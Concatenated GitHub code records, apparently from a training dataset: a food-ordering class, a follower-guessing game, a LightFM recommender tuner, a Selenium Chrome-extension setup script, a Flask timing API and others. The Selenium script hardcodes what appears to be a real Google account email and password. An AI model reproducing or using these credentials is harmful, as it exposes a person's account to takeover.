find_client.shopping_cart.append(menu_info[meal_name])\n\n find_client.bill += sum(menu_info[name].price * quantity for name, quantity in meal_names_and_quantities.items())\n find_client.ordered_meals.update(meal_names_and_quantities)\n\n return f\"Client {client_phone_number} successfully ordered {', '.join(find_client.ordered_meals)} for {find_client.bill:.2f}lv.\"\n\n def cancel_order(self, client_phone_number: str):\n new_client = self.__get_or_create_client(client_phone_number)\n\n if not client.shopping_cart:\n raise Exception(\"There are no ordered meals!\")\n\n menu_info = self.__get_menu()\n\n for name, qty in new_client.ordered_meals.items():\n menu_info[name].quantity += qty\n\n new_client.bill = 0\n new_client.shopping_cart = []\n new_client.ordered_meals = {}\n\n return f\"Client {new_client.phone_number} successfully canceled his order.\"\n\n def finish_order(self, client_phone_number: str):\n new_client = self.__get_or_create_client(client_phone_number)\n\n if not client.shopping_cart:\n raise Exception(\"There are no ordered meals!\")\n\n current_receipt_id = self.receipt_id\n self.receipt_id += 1\n total_bill = new_client.bill\n\n new_client.bill = 0\n new_client.shopping_cart = []\n new_client.ordered_meals = {}\n\n return f\"Receipt #{current_receipt_id} with total amount of {total_bill:.2f} was successfully paid for {client_phone_number}.\"\n\n def __str__(self):\n return f\"Food Orders App has {len((self.menu))} meals on the menu and {len(self.clients_list)} clients.\"","repo_name":"KonstantinPetkov/SoftUni-OOP","sub_path":"exam_preparation_22_08_22/project/food_orders_app.py","file_name":"food_orders_app.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18662821372","text":"from game_data import data\nfrom art import logo,vs\nfrom replit import clear\nimport random\n\ndef get_arandom():\n return random.choice(data)\n\ndef account_data(account):\n name = account['name']\n description = account['description']\n country = account['country']\n return f\"{name}, {description}, {country}.\"\n \ndef answer_check(followers_a,followers_b,answer):\n if followers_a > followers_b:\n return answer == 'a'\n else:\n return answer == 'b'\n \n\ndef game():\n score =0\n should_countinue = True\n print(logo)\n account_a = get_arandom()\n account_b = get_arandom()\n\n while should_countinue:\n account_a = account_b\n account_b = get_arandom()\n \n while account_a == account_b:\n account_b = get_arandom()\n \n print(\"Compare A: \",account_data(account_a))\n print(vs)\n print(\"Against B: \",account_data(account_b))\n \n answer = input(\"Who has more followers? Type 'A' or 'B': \").lower()\n followers_a = account_a['follower_count']\n followers_b = account_b['follower_count']\n is_check = answer_check(followers_a,followers_b,answer)\n \n clear()\n print(logo)\n \n if is_check:\n score +=1\n print(f\"You're right! Current score: {score}\")\n else:\n should_countinue = False\n print(f\"Sorry, that's wrong. Final score: {score}\")\n\ngame()\n","repo_name":"Abdirashid-dv/100Days-of-code-python","sub_path":"Day-14/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9242696832","text":"import unittest\n\nfrom app import app\n\n\nclass AppTestCase(unittest.TestCase):\n\n def test_ping(self):\n tester = app.test_client(self)\n response = tester.get('/ping')\n assert 'PONG' in response.data\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Dantergy/etl_api","sub_path":"integration-skill-test-server-master/webapp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14591912478","text":"from functools import partial, reduce\nimport itertools\nfrom lightfm import LightFM\nfrom lightfm.cross_validation import random_train_test_split\nfrom lightfm.data import Dataset\nfrom lightfm.evaluation import auc_score, precision_at_k, recall_at_k\nimport numpy as np\nimport operator\nimport os\nimport pandas as pd\nimport random\nimport scipy.sparse as sp\nfrom scipy.stats import rankdata\nimport time\n\n\nclass ParameterGrid(object):\n \"\"\"Grid of parameters with a discrete number of values for each.\n Can be used to iterate over parameter value combinations with the Python built-in function iter.\n Adapted from scikit-learn\n ----------\n param_grid : dict of string to sequence\n The parameter grid to explore, as a dictionary mapping estimator parameters to sequences of allowed values.\n An empty dict signifies default parameters.\n\n \"\"\"\n\n def __init__(self, param_grid):\n\n self.param_grid = [param_grid]\n\n def __iter__(self):\n \"\"\"Iterate over the points in the grid.\n Returns\n -------\n params : iterator over dict of string to any\n Yields dictionaries mapping each estimator parameter to one of its allowed values.\n \"\"\"\n for p in self.param_grid:\n # Always sort the keys of a dictionary, for reproducibility\n items = sorted(p.items())\n if not items:\n yield {}\n else:\n keys, values = zip(*items)\n for v in itertools.product(*values):\n params = dict(zip(keys, v))\n yield params\n\n def __len__(self):\n \"\"\"Number of points on the grid.\"\"\"\n # Product function that can handle iterables (np.product can't).\n product = partial(reduce, operator.mul)\n return sum(product(len(v) for v in p.values()) if p else 1\n for p in self.param_grid)\n\n\nclass LFM:\n \"\"\"Latent Factor Model (LFM) class, based on LightFM\n It must be initalized either with a set of interactions in sparse COO format, or with the path to the csv file with\n the ratings matrix (user x items)\n Interactions and weights are then processed and loaded as properties in accordance with LightFM expected structure\n \"\"\"\n\n def __init__(self,\n interactions=None,\n weights=None,\n path=None,\n category=None,\n use_weights=False,\n **kwargs):\n \"\"\"\n :param interactions: sparse COO matrix containing every user-item interaction\n :param weights: sparse COO matrix containing the weights of each user-item interaction\n :param path:(string) - path to the csv file to be processed - must be a user x item ratings matrix or a user:\n item interactions list\n :param type:(string) \"interactions\" or \"ratings_matrix\" to guide the data pre-processing\n :param kwargs: legacy, originally used to initialize Connector class - to be updated when dealing with db\n \"\"\"\n # Check that the user has supplied some input, implicit or explicit\n if interactions is None and path is None:\n raise ValueError(\"The user must provide a path to a file or some interactions to instantiate the class\")\n # Check that if a path has been supplied the variable type is valid\n if path is not None and (category != \"interactions\" and category != \"ratings_matrix\"):\n raise ValueError(\"The parameter 'category' must be provided and can only take one of two values: \"\n \"'interactions' or 'ratings_matrix'\")\n # Make sure the interactions and weights, if supplied, are in the correct format\n if interactions is not None and type(interactions) != sp.coo.coo_matrix:\n raise TypeError(\"The interactions object must be a scipy sparse COO matrix!\")\n if weights is not None and type(weights) != sp.coo.coo_matrix:\n raise TypeError(\"The weights object must be a scipy sparse COO matrix!\")\n\n self.best_model = None\n self.best_params = None\n self.best_score = 0\n self._category = category\n self._interactions = interactions\n self.mapping = None\n self.model = None\n self.path = path\n self._use_weights = use_weights\n self._weights = weights\n\n @property\n def interactions(self):\n # If interactions have not been supplied, process the file provided in source\n # N.B. This property also sets weights, which is probably not a best practice\n if self._interactions is None:\n\n if self._category == 'ratings_matrix':\n rm_df = pd.read_csv(self.path)\n ids = rm_df['sub']\n rm_df = rm_df.set_index(keys='sub')\n if 'Unnamed: 0' in rm_df.columns:\n rm_df.drop('Unnamed: 0', axis=1, inplace=True)\n dataset = Dataset()\n dataset.fit(list(ids),\n list(rm_df.columns))\n self.mapping = dataset.mapping()\n\n interactions = []\n\n for item in rm_df.columns.tolist():\n users = rm_df.index[rm_df[item] >= 1].tolist()\n counts = rm_df[item][rm_df[item] >= 1]\n interactions.extend(zip(users, itertools.repeat(item, len(users)), counts))\n\n (self._interactions, self._weights) = dataset.build_interactions(interactions)\n\n else:\n int_df = pd.read_csv(self.path)\n if 'Unnamed: 0' in int_df.columns:\n int_df.drop('Unnamed: 0', axis=1, inplace=True)\n int_df = int_df.groupby(['subscriber_id', 'ddi_block_id']).size().reset_index()\\\n .rename(columns={0:'count'})\n dataset = Dataset()\n ids = int_df['subscriber_id'].unique()\n items = int_df['ddi_block_id'].unique()\n dataset.fit(list(ids),\n list(items))\n self.mapping = dataset.mapping()\n\n if self._use_weights:\n interactions = zip(int_df['subscriber_id'], int_df['ddi_block_id'], int_df['count'])\n else:\n interactions = zip(int_df['subscriber_id'], int_df['ddi_block_id'])\n (self._interactions, self._weights) = dataset.build_interactions(interactions)\n\n else:\n return self._interactions\n\n @interactions.setter\n def interactions(self, value):\n self._interactions = value\n\n @property\n def weights(self):\n if self._weights is None:\n pass # to be implemented\n else:\n return self._weights\n\n @weights.setter\n def weights(self, value):\n self._weights = value\n\n def init_model(self,\n no_components=10,\n k=5,\n n=10,\n learning_schedule='adagrad',\n loss='logistic',\n learning_rate=0.05,\n rho=0.95,\n epsilon=1e-06,\n item_alpha=0.0,\n user_alpha=0.0,\n max_sampled=10,\n random_state=None):\n \"\"\"\n Initialize model to be evaluated.\n :param no_components:(int, optional) – the dimensionality of the feature latent embeddings.\n :param k:(int, optional) – for k-OS training, the k-th positive example will be selected from the\n n positive examples sampled for every user.\n :param n:(int, optional) – for k-OS training, maximum number of positives sampled for each update.\n :param learning_schedule:(string, optional) – one of (‘adagrad’, ‘adadelta’).\n :param loss:(string, optional) – one of (‘logistic’, ‘bpr’, ‘warp’, ‘warp-kos’): the loss function.\n :param learning_rate:(float, optional) – initial learning rate for the adagrad learning schedule.\n :param rho:(float, optional) – moving average coefficient for the adadelta learning schedule.\n :param epsilon:(float, optional) – conditioning parameter for the adadelta learning schedule.\n :param item_alpha:(float, optional) – L2 penalty on item features.\n :param user_alpha:(float, optional) – L2 penalty on user features.\n :param max_sampled:(int, optional) – maximum number of negative samples used during WARP fitting.\n :param random_state:(int seed, RandomState instance, or None)\n \"\"\"\n self.model = LightFM(no_components=no_components,\n k=k,\n n=n,\n learning_schedule=learning_schedule,\n loss=loss,\n learning_rate=learning_rate,\n rho=rho,\n epsilon=epsilon,\n item_alpha=item_alpha,\n user_alpha=user_alpha,\n max_sampled=max_sampled,\n random_state=random_state)\n\n def train(self,\n interactions,\n partial=False,\n user_features=None,\n item_features=None,\n sample_weight=None,\n epochs=1,\n verbose=False):\n \"\"\"\n Train the model in self.model either partially (i.e. for one epoch, starting from the last trained parameters)\n or till the end, for a maximum number of epochs\n :param interactions:(COO matrix, required) - set of training user-item interactions\n :param partial:(bool, optional) - fit the model partially if True, to completion otherwise\n :param user_features:(CSR matrix of shape [n_users, n_user_features], optional) - set of user features\n :param item_features:(CSR matrix of shape [n_items, n_item_features], optional) - set of item features\n :param sample_weight:(COO matrix, optional) - matrix with entries expressing weights of individual interactions\n :param epochs:(int, optional) - number of epochs for the training, only used if partial==False\n :param verbose:(bool, optional) – whether to print progress messages\n \"\"\"\n if partial:\n self.model.fit_partial(interactions=interactions,\n user_features=user_features,\n item_features=item_features,\n sample_weight=sample_weight,\n epochs=1,\n verbose=verbose)\n else:\n self.model.fit(interactions=interactions,\n user_features=user_features,\n item_features=item_features,\n sample_weight=sample_weight,\n epochs=epochs,\n verbose=verbose)\n\n @staticmethod\n def evaluate_model(model, metric, test, train):\n \"\"\"\n Evaluate trained model on the test set, using one of the three available accuracy metrics\n AUC: the probability that a randomly chosen positive example has a higher score than a randomly chosen\n negative example.\n Precision: the fraction of known positives in the first k positions of the ranked list of results.\n Recall: the number of positive items in the first k positions of the ranked list of results divided by the\n number of positive items in the test period.\n :param model:(LightFM, required) - model to be evaluated\n :param metric:(string, required) - accuracy metric to be used, one of ['auc', 'precision', 'recall']\n :param test:(COO matrix, required) - known positives used to test the model\n :param train:(COO matrix, required) - training set; these interactions will be omitted from the score\n calculations to avoid re-recommending known positives.\n :return: test_score (float) - score computed on the test set\n \"\"\"\n try:\n # make sure the metric is correct\n assert metric in ['auc', 'precision', 'recall']\n if metric == 'auc':\n test_score = auc_score(model, test, train).mean()\n elif metric == 'precision':\n test_score = precision_at_k(model, test, train, k=5).mean()\n else:\n test_score = recall_at_k(model, test, train, k=5).mean()\n return test_score\n except AssertionError:\n print('The metric provided is not correct or available!')\n\n def grid_search(self,\n params,\n metric='auc',\n max_iterations=None,\n max_epochs=50,\n early_stopping=False,\n use_weights=False):\n \"\"\"\n Standard grid search method to select the hyper-parameters that result in the highest score on the test set.\n Uses ParameterGrid class from scikit-learn in order to create an iterable of all possible hyper-parameter\n combinations.\n The user can supply a max_iterations value that will stop the search once said number of combinations has been\n reached. Furthermore, early_stopping can be set to True to stop the training of a particular model when the test\n score has stopped improving, which is particularly useful when overfitting.\n :param params:(dict, required) - dictionary of parameters to test, {parameter: [list of values to try]}\n :param metric:(string, optional) - metric to use to pick the best model\n :param max_iterations:(int, optional) - if provided, the hyper-parameter optimization will stop after this many\n tests, irrespective of len(ParameterGrid(params))\n :param max_epochs:(int, optional) - max number of epochs to train each model\n :param early_stopping:(bool, optional) - if True, the training of a model will be partial and will stop after 5\n epochs of non-improvement on the test score; the model will then be re-trained using the optimal number\n of epochs\n :param use_weights:(bool, optional) - if True, the training procedure will use weights to value repeated\n interactions more\n \"\"\"\n # Raise an error if any of the parameters supplied is not one of the arguments used by self.init_model\n valid_params = self.init_model.__code__.co_varnames\n if any([x not in valid_params for x in params.keys()]):\n raise ValueError(\"One of the hyper-parameters supplied is invalid. Please make sure there are no typos.\")\n # Reset best values\n self.best_model = None\n self.best_params = None\n self.best_score = 0\n\n # Create train and test datasets\n (train_set, test_set) = random_train_test_split(self._interactions, test_percentage=0.2)\n # Since we cannot provide the same seed to random_train_test_split, using it on self._weights would generate a\n # set of weights that doesn't match train_set; we are thus forced to use the following convoluted procedure\n if use_weights and self._weights is not None:\n weights_csr = self._weights.tocsr()\n data = [weights_csr[u, i] for u, i in zip(train_set.row, train_set.col)]\n\n train_weights = sp.coo_matrix((data,\n (train_set.row,\n train_set.col)),\n shape=self._weights.shape,\n dtype=self._weights.dtype)\n else:\n train_weights = None\n\n # Create ParameterGrid instance to be iterated\n grid = ParameterGrid(params)\n # If max_iterations has not been provided then test all parameter combinations\n if not max_iterations:\n max_iterations = len(grid)\n # Turn grid from iterable to iterator\n grid = iter(grid)\n test_params = next(grid)\n test_params_idx = 1\n\n start_time = time.time()\n\n while test_params and test_params_idx <= max_iterations:\n # Initialize model with current combination of hyper-parameters to be tested\n self.init_model(**test_params)\n\n if early_stopping:\n best_iter = 0\n best_score = 0\n iters_no_improvement = 0\n # Train the model for max_epochs, evaluating it at each step\n for i in range(max_epochs):\n self.train(train_set, sample_weight=train_weights, partial=True)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n if test_score > best_score:\n best_iter = i+1\n best_score = test_score\n iters_no_improvement = 0\n else:\n iters_no_improvement += 1\n # If the test score has not improved in the last 5 epochs stop the training\n if iters_no_improvement == 5:\n break\n # If the last epoch did not result in the highest test score, re-train the model for the optimal number\n # of epochs\n if best_iter != max_epochs:\n self.init_model(**test_params)\n self.train(train_set, sample_weight=train_weights, epochs=best_iter)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n\n else:\n self.train(train_set, sample_weight=train_weights, epochs=max_epochs)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n\n # If the test score achieved by this model was the highest so far, set the class variables accordingly\n if test_score > self.best_score:\n self.best_model = self.model\n self.best_params = test_params\n self.best_score = test_score\n\n elapsed_time = (time.time() - start_time)/60\n\n print('Hyperparameters tested: {}/{}; {} score: {}; total time: {:.2f} minutes'.format(test_params_idx,\n max_iterations,\n metric,\n test_score,\n elapsed_time))\n\n test_params = next(grid)\n test_params_idx += 1\n\n print('The best model achieved a {} score of {} on the test set, with parameters {}'.format(metric,\n self.best_score,\n self.best_params))\n\n def randomized_search(self,\n params,\n metric='auc',\n max_iterations=None,\n max_epochs=50,\n early_stopping=False,\n use_weights=False):\n \"\"\"\n Standard randomized search method to select the hyper-parameters that result in the highest score on the test\n set. Each iteration will sample one of the possible combinations of hyper-parameters.\n Uses ParameterGrid class from scikit-learn in order to create an iterable of all possible hyper-parameter\n combinations.\n The user can supply a max_iterations value that will stop the search once said number of combinations has been\n reached. Furthermore, early_stopping can be set to True to stop the training of a particular model when the test\n score has stopped improving, which is particularly useful when overfitting.\n :param params:(dict, required) - dictionary of parameters to test, {parameter: [list of values to try]}\n :param metric:(string, optional) - metric to use to pick the best model\n :param max_iterations:(int, optional) - if provided, the hyper-parameter optimization will stop after this many\n tests, irrespective of len(ParameterGrid(params))\n :param max_epochs:(int, optional) - max number of epochs to train each model\n :param early_stopping:(bool, optional) - if True, the training of a model will be partial and will stop after 5\n epochs of non-improvement on the test score; the model will then be re-trained using the optimal number\n of epochs\n :param use_weights:(bool, optional) - if True, the training procedure will use weights to value repeated\n interactions more\n \"\"\"\n # Raise an error if any of the parameters supplied is not one of the arguments used by self.init_model\n valid_params = self.init_model.__code__.co_varnames\n if any([x not in valid_params for x in params.keys()]):\n raise ValueError(\"One of the hyper-parameters supplied is invalid. Please make sure there are no typos.\")\n\n # Reset best values\n self.best_model = None\n self.best_params = None\n self.best_score = 0\n\n # create train and test datasets\n (train_set, test_set) = random_train_test_split(self._interactions, test_percentage=0.2)\n if use_weights and self._weights is not None:\n weights_csr = self._weights.tocsr()\n data = [weights_csr[u, i] for u, i in zip(train_set.row, train_set.col)]\n\n train_weights = sp.coo_matrix((data,\n (train_set.row,\n train_set.col)),\n shape=self._weights.shape,\n dtype=self._weights.dtype)\n else:\n train_weights = None\n\n # Create ParameterGrid instance to be iterated and cast it to list\n grid = list(ParameterGrid(params))\n # If max_iterations has not been provided then test all parameter combinations\n if not max_iterations:\n max_iterations = len(grid)\n # Shuffle the list and pop out and remove the last element\n random.shuffle(grid)\n test_params = grid.pop()\n test_params_idx = 1\n\n start_time = time.time()\n\n while test_params and test_params_idx <= max_iterations:\n # Initialize model with current combination of hyper-parameters to be tested\n self.init_model(**test_params)\n\n if early_stopping:\n best_iter = 0\n best_score = 0\n iters_no_improvement = 0\n # Train the model for max_epochs, evaluating it at each step\n for i in range(max_epochs):\n self.train(train_set, sample_weight=train_weights, partial=True)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n if test_score > best_score:\n best_iter = i+1\n best_score = test_score\n iters_no_improvement = 0\n else:\n iters_no_improvement += 1\n # If the test score has not improved in the last 5 epochs stop the training\n if iters_no_improvement == 5:\n break\n\n # If the last epoch did not result in the highest test score, re-train the model for the optimal number\n # of epochs\n if best_iter != max_epochs:\n self.init_model(**test_params)\n self.train(train_set, sample_weight=train_weights, epochs=best_iter)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n\n else:\n self.train(train_set, sample_weight=train_weights, epochs=max_epochs)\n test_score = self.evaluate_model(self.model, metric, test_set, train_set)\n\n # If the test score achieved by this model was the highest so far, set the class variables accordingly\n if test_score > self.best_score:\n self.best_model = self.model\n self.best_params = test_params\n self.best_score = test_score\n\n random.shuffle(grid)\n if grid:\n test_params = grid.pop()\n else:\n test_params = None\n\n elapsed_time = (time.time() - start_time)/60\n\n print('Hyperparameters tested: {}/{}; {} score: {}; total time: {:.2f} minutes'.format(test_params_idx,\n max_iterations,\n metric,\n test_score,\n elapsed_time))\n test_params_idx += 1\n\n print('The best model achieved a {} score of {} on the test set, with parameters {}'.format(metric,\n self.best_score,\n self.best_params))\n\n def predict(self,\n users,\n items,\n what='scores',\n item_features=None,\n user_features=None):\n \"\"\"\n Prediction method: once the best hyper-parameters have been selected and the resulting model has been trained,\n this can be used the get predictions for a (sub)set of users. The predictions can be in the form of absolute\n scores on in terms of ranks, 1 being the highest.\n :param users:(np.int32 array of shape [n_pairs,], required) - user ids for whom we want predictions\n :param items:(np.int32 array of shape [n_pairs,], required) - item ids for which we want predictions\n :param what:(string, optional) - must be 'scores' or 'ranks'\n :param user_features:(CSR matrix of shape [n_users, n_user_features], optional) - set of user features\n :param item_features:(CSR matrix of shape [n_items, n_item_features], optional) - set of item features\n :return:(np.float32 array of shape [n_pairs,]): Numpy array containing the recommendation scores for pairs\n defined by the inputs.\n \"\"\"\n # check the training has been done and we have picked a best model\n if self.best_model:\n scores = np.empty(shape=(len(users), len(items)))\n for i, user in enumerate(users):\n scores[i] = self.best_model.predict(user_ids=user,\n item_ids=items,\n user_features=user_features,\n item_features=item_features)\n if what == 'scores':\n return scores\n elif what == 'ranks':\n ranks = np.empty_like(scores)\n for i, score in enumerate(scores):\n ranks[i] = len(score) + 1 - rankdata(score).astype(int)\n return ranks\n else:\n print(\"The parameter 'how' can only be 'scores' or 'ranks'\")\n else:\n print('The model has not been trained yet!')\n","repo_name":"DalbergDataInsights/CubicA","sub_path":"modules/recommender/latent_factor_models.py","file_name":"latent_factor_models.py","file_ext":"py","file_size_in_byte":28024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"31794290397","text":"from selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom time import sleep\nfrom soup import Soup\nfrom webdriver_manager.utils import chrome_version\nimport os, glob, shutil, subprocess, zipfile\nimport pyautogui as pg\n\n\ndef help_s():\n ver = chrome_version()[:2]\n print(ver)\n n = \"\"\n if ver == \"95\":\n n = 0\n elif ver == \"94\":\n n = 1\n elif ver == \"93\":\n n = 2\n\n li = Soup.bs(\"https://chromedriver.chromium.org/downloads\")\n lis = li.find_all(\"li\", class_=\"TYR86d wXCUfe zfr3Q\")\n down = lis[n].find(\"a\", class_=\"XqQF9c\").get(\"href\")\n print(down)\n subprocess.Popen([r\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\", down])\n sleep(3)\n for i in range(4):\n pg.hotkey(\"tab\")\n pg.hotkey(\"enter\")\n # dri, no = bs_req(down)\n # print(dri)\n # url = dri.find(\"tbody\").find_all(\"tr\")[4].find(\"a\").get(\"href\")\n # url = \"https://chromedriver.storage.googleapis.com/\" + url\n\n\ndef nfreez():\n with zipfile.ZipFile('C:\\\\Users\\\\sml\\\\Downloads\\\\chromedriver_mac64.zip') as exi_zip:\n exi_zip.extract(\"chromedriver\", \"extensions\")\n\n\ndef start_chrome(path):\n # Chrome起動\n options = webdriver.ChromeOptions()\n\n options.add_argument(\"start-maximized\")\n options.add_argument('--user-data-dir={0}'.format(path))\n driver = webdriver.Chrome(options=options,\n executable_path=\"extensions/chromedriver.exe\")\n driver.maximize_window() # 画面サイズ最大化\n\n # GoogleログインURL\n # url = 'https://www.google.com/accounts?hl=ja-JP'\n # driver.get(url)\n\n return driver\n\n\ndef login_google(driver):\n # ログイン情報\n login_id = \"yuki.ikura.kojima@gmail.com\"\n login_pw = \"yuki1311\"\n\n # 最大待機時間(秒)\n wait_time = 30\n\n # IDを入力\n login_id_xpath = '//*[@id=\"identifierNext\"]'\n # xpathの要素が見つかるまで待機します。\n sleep(10)\n WebDriverWait(driver, wait_time).until(EC.presence_of_element_located((By.XPATH,\n login_id_xpath)))\n driver.find_element_by_name(\"identifier\").send_keys(login_id)\n driver.find_element_by_xpath(login_id_xpath).click()\n\n # パスワードを入力\n login_pw_xpath = '//*[@id=\"passwordNext\"]'\n # xpathの要素が見つかるまで待機します。\n WebDriverWait(driver, wait_time).until(EC.presence_of_element_located((By.XPATH,\n login_pw_xpath)))\n driver.find_element_by_name(\"password\").send_keys(login_pw)\n sleep(1) # クリックされずに処理が終わるのを防ぐために追加。\n driver.find_element_by_xpath(login_pw_xpath).click()\n\n\ndef gfp_option(driver):\n driver.get(\"chrome-extension://fdpohaocaechififmbbbbbknoalclacl/options.html\")\n sleep(5)\n driver.find_elements_by_class_name(\"options-input\")[6].click()\n # driver.execute_script('return document.querySelectorAll(\".options-input\")[6].click()')\n sleep(2)\n pg.hotkey(\"left\")\n sleep(1)\n pg.hotkey(\"enter\")\n sleep(1)\n driver.quit()\n\n\ndef expand_shadow_element_gfp(driver):\n driver.get(\n \"https://chrome.google.com/webstore/detail/gofullpage-full-page-scre/fdpohaocaechififmbbbbbknoalclacl?hl=ja\")\n sleep(5)\n driver.execute_script('return document'\n '.querySelector(\".g-c-x\").click()')\n\n sleep(3)\n pg.hotkey(\"left\")\n sleep(2)\n pg.hotkey(\"enter\")\n\n # return shadow_root\n\n\ndef expand_shadow_element_ext(driver, j):\n driver.get(\"chrome://extensions/\")\n sleep(3)\n print(j)\n # j = str(j)\n # j = j.replace(\"\\\\\", \"\\\\\\\\\")\n driver.execute_script('return document.querySelector(\"extensions-manager\")'\n '.shadowRoot.querySelector(\"extensions-toolbar\")'\n '.shadowRoot.querySelector(\"#packExtensions\").click()')\n input()\n # sleep(3)\n # # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # # '.shadowRoot.querySelector(\"cr-dialog\").querySelector(\"#root-dir\")'\n # # '.shadowRoot.querySelector(\"#input\").value=\"{0}\"'.format(j))\n # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # '.shadowRoot.querySelector(\"cr-dialog\").querySelector(\"#root-dir\")'\n # \".setAttribute('focused_', '')\")\n # driver.execute_script('return document.querySelector(\"html\").setAttribute(\"class\",\"in-dev-mode focus-outline-visible\")')\n #\n # sleep(3)\n # print(j)\n # a = 'button-container'\n # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # '.shadowRoot.querySelector(\"cr-dialog\")'\n # '.querySelector(\"[slot= {0}]\").querySelector(\".action-button\").setAttribute(\"aria-disabled\", \"false\")'.format(a))\n # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # '.shadowRoot.querySelector(\"cr-dialog\")'\n # '.querySelector(\"[slot= {0}]\").querySelector(\".action-button\").setAttribute(\"tabindex\", \"0\")'.format(a))\n # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # '.shadowRoot.querySelector(\"cr-dialog\")'\n # '.querySelector(\"[slot= {0}]\").querySelector(\".action-button\").removeAttribute(\"disabled\")'.format(a))\n #\n #\n # driver.execute_script('return document.querySelector(\"extensions-manager\")'\n # '.shadowRoot.querySelector(\"extensions-toolbar\")'\n # '.shadowRoot.querySelector(\"extensions-pack-dialog\")'\n # '.shadowRoot.querySelector(\"cr-dialog\").querySelector(\"[slot={0}]\").querySelector(\".action-button\").click()'.format(a))\n\n\n# noinspection PyBroadException\ndef main():\n u_name = os.getlogin()\n ud_path = 'C:\\\\Users\\\\{0}\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data'.format(u_name)\n driver2 = start_chrome(ud_path)\n\n expand_shadow_element_gfp(driver2)\n sleep(10)\n driver2.quit()\n gfp_id = \"fdpohaocaechififmbbbbbknoalclacl\"\n gfp_path = glob.glob(os.path.join(ud_path, \"Default\\Extensions\", gfp_id, \"*\"))\n try:\n os.mkdir(\"extensions\")\n except:\n pass\n driver2 = start_chrome(ud_path)\n for i in gfp_path:\n expand_shadow_element_ext(driver2, i)\n gfp_option(driver2)\n crx_path = glob.glob(os.path.join(ud_path, \"Default\\Extensions\", gfp_id, \"*.crx\"))\n for i in crx_path:\n shutil.copyfile(i, \"extensions\\{0}\".format(os.path.basename(i)))\n\n # x = input()\n # pg.hotkey(\"shift\", \"ctrl\", \"i\")\n # sleep(1)\n # pg.hotkey(\"shift\", \"ctrl\", \"m\")\n # sleep(1)\n # pg.hotkey(\"shift\", \"alt\", \"p\")\n # sleep(50)\n driver2.quit()\n\n\nif __name__ == \"__main__\":\n help_s()\n nfreez()\n main()\n # Googleにログイン\n # login_google(driver2)\n","repo_name":"rabi-design/pyt","sub_path":"other/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32197411110","text":"import flux\nimport requests\nfrom ...models import Timing, db\nfrom .blueprint import API\nfrom flask_simple_api import error_abort\nfrom sqlalchemy import and_, case, func\nfrom sqlalchemy.exc import IntegrityError\n\nNoneType = type(None)\n\n\n@API\ndef report_timing_start(name: str, session_id: int, test_id: (int, NoneType)=None): # pylint: disable=bad-whitespace\n interval = -flux.current_timeline.time()\n try:\n db.session.execute(\n Timing.__table__.insert().values(\n session_id=session_id, test_id=test_id, name=name, total=interval))\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n res = db.session.execute(\n Timing.__table__.update()\n .values(total=Timing.total+interval)\n .where(and_(Timing.session_id==session_id, Timing.test_id==test_id, Timing.name==name, Timing.total >= 0)))\n if res.rowcount != 1:\n error_abort('Attempted to start measurement on an already started metric', code=requests.codes.conflict) # pylint: disable=no-member, line-too-long\n db.session.commit()\n\n\n@API\ndef report_timing_end(name: str, session_id: int, test_id: (int, NoneType)=None): # pylint: disable=bad-whitespace\n timing = Timing.query.filter_by(session_id=session_id, test_id=test_id, name=name).first_or_404()\n timing.total = Timing.total + flux.current_timeline.time()\n db.session.commit()\n\n\n@API\ndef get_timings(session_id: (int, NoneType)=None, test_id: (int, NoneType)=None):\n now = flux.current_timeline.time()\n total_clause = case(\n [\n (Timing.total < 0, now + Timing.total)\n ], else_=Timing.total)\n if session_id is None and test_id is None:\n return {}\n if session_id is not None:\n total_sum_subquery = db.session.query(Timing.name, func.sum(total_clause).label('total_time')).\\\n group_by(Timing.session_id, Timing.name).filter_by(session_id=session_id).subquery()\n query = db.session.query(func.json_object_agg(total_sum_subquery.c.name, total_sum_subquery.c.total_time))\n else:\n query = db.session.query(func.json_object_agg(Timing.name, total_clause)).\\\n filter_by(test_id=test_id)\n return query.scalar() or {}\n","repo_name":"getslash/backslash","sub_path":"flask_app/blueprints/api/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"81"} +{"seq_id":"5249905801","text":"# 3234. 준환이의 양팔저울\nimport math\n\n\n# 저울 